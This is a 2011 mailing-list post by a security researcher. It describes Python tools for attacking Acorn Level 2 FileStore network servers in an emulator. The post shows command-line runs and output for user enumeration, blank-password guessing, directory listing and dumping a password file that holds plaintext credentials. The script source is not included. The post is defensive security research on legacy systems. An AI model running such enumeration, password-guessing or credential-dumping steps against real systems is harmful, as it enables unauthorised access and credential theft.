Subject: Security Project

<< Previous Message	Main Index	Next Message >>
<< Previous Message in Thread	This Month	Next Message in Thread >>
Date   : Sun, 13 Nov 2011 12:49:02 +0000
From   : Martyn.Ruks@... (Martyn Ruks)
Subject: Security Project - Update 1

I thought I'd give an update on the list as the website for the project won't
be up for a couple of weeks. You will eventually find it under Projects on
the following site:

http://labs.mwrinfosecurity.com

I will send a direct link to the list in a couple of weeks time.

Thanks to everyone who has responded so far, I hope to enlist help from people
as I progress. I'll put together something that highlights the areas I'm
thinking about looking at but as a starter for 10 I thought I'd include a
progress update.

I have approached the subject from where my strength lies in network security 
and so started looking at the login process. I have now written some python 
code that will talk to a Level 2 FileStore using the UDP/IP transport as 
that works well with BeebEm. I have included some output here for those 
that are interested (the scripts will be published once the project site 
is up). Just so everyone is clear on my motives any tools and scripts are
produced to help people test and secure their own systems, they can obviously
be used to attack systems but that is not mine or my company's intention.

Searching for valid users on the FileStore. Any other common users that are
observed on these systems would be welcomed to add into my username list.

$ python enum.py -t 192.168.0.254 -p 32768 -f users.txt -v 1
Trying User: SYST
User SYST exists!
Trying User: MANAGER
User MANAGER exists!
Trying User: TEST
User TEST exists!
Trying User: TESTING
No such user as TESTING
Trying User: ADMIN
No such user as ADMIN
Trying User: SYS
No such user as SYS
Trying User: GUEST
No such user as GUEST
Trying User: ROOT
No such user as ROOT
Trying User: MAIL
No such user as MAIL
Trying User: ACORN
No such user as ACORN
Trying User: NETWORK
No such user as NETWORK
Trying User: BBCUSER
No such user as BBCUSER
Trying User: BBC
No such user as BBC
Trying User: USER
No such user as USER
Trying User: USER1
No such user as USER1
Trying User: STATION
No such user as STATION
Trying User: SYSTEM
No such user as SYSTEM
Trying User: GOD
No such user as GOD

Then once we know some users we can check whether they have guessable passwords.
This will be adapted to allow password guessing attacks against a single account.

$ python passwords.py -t 192.168.0.254 -p 32768 -f users.txt -v 1
Trying User: SYST
User SYST does NOT have password BLANK
Trying User: MANAGER
User MANAGER does NOT have password BLANK
Trying User: TEST
User TEST has password BLANK

Then once you have got access as a user the CAT tool can let you get listings
of directories. Still crude and needs bug fixing.

$ python catalogue.py -t 192.168.0.254 -p 32768 -u TEST -d "$"
User TEST logged in with password BLANK
$         (ff07)
FILES           
Dir. $           Library LIBRARY   
LIBRARY    DL/    
LIBRARYF   DL/    
PASSWORDS  LWR/R  
SECRET     DL/    

Then you can read files from the system using a crude copy of dump, also
available is a mode to dump the password file in friendly format. This is
the latter mode.
 
$ python dump.py -t 192.168.0.254 -p 32768 -u TEST -f 1 -d "$.PASSWORDS"
Logged on with user TEST and password BLANK

Username         | Password    | Priv 
================================
SYST               | FKJU         | Y
TEST                |                   | N
MANAGER     | XFFGAF    | N
BACKDOOR   | PASS        | Y

Hopefully that give a flavour of what I have done so far and more updates 
expected in the coming weeks. If anybody has BASIC versions of what I have 
done in python please let me know as would love to run these attacks from
an emulator or hardware as well. I will try my hand at some BASIC network
programming later in the project.


MWR InfoSecurity
Churchill Plaza . Churchill Way . Basingstoke . RG21 7GP . UK
        
Tel +44 1256 300920
Fax  +44 1256 811227
        
www.mwrinfosecurity.com Information security risk, compliance and management
specialists
        
The information transmitted is intended only for the addressee and may contain 
confidential and/or privileged material. Any review, retransmission, dissemination 
or other use of, or taking of any action in reliance upon, this information 
by persons or entities other than the intended recipient is prohibited. 
Any opinions expressed in this email are those of the individual and not
necessarily the Company. If you receive this transmission in error, please
email to martyn.ruks@...
<< Previous Message	Main Index	Next Message >>
<< Previous Message in Thread	This Month	Next Message in Thread >>